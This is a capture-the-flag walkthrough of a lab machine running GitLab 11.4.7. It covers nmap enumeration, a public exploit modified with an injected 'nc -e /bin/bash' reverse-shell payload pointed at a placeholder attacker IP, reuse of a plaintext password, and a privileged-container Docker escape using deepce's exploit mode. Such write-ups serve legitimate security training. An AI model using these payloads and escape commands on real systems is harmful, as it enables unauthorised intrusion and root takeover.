Ready

1 minute read

img

Port Scanning and General Enumeration (Nmap)

nmap -sV -sC -oN nmap/initial -T4 10.10.10.220

img

22 and ..5080?

img

Gitlab!


Access (searchsploit, gitlab)

Let’s see what version of Gitlab we’re working with

  1. top right, drop down menu
  2. help

img

Gitlab version 11.4.7

Checking searchsploit for public exploits for Gitlab 11.4.7

img

I used the first one but it requires a bit of editing. Here’s what I added:

open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]

The original wouldn’t work, this one should. (replace YOURIP and YOURPORT with your listening ip and port, respectively)

Start a listener

nc -lvnp 4444

And run the script!

python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -p YOUR PORT

img

img

Quick tip!

You may want to stabilize your shell at this point. A quick and dirty way to do so is

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Privesc Part 1 (password-reuse, linpeas)

Linpeas kicks back a lot of juicy informtion, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of K.I.S.S.

K.I.S.S.

keep it simple stupid

Main two things we’re after here:

img

img

keep that in mind for later

First thing you should always do when you find a plaintext password? Use it! Use it everywhere!

Turns out..

img

Let’s capture the root fla—

img

Well, let’s try and escape the docker then!


Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)

First things first when trying to do anything: Enumeration. We’ll be using deepce. It’s very similar to Linpeas. It’s amazing.

The interesting finding:

img

Running a container as privileged gives us the ability to execute commands as root.

The other cool feature of deepce is it has an exploit mode

./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

you can read about the available exploits by following the link above in Reading/Resources

All that’s left to do is ssh in as the new root user!

img

img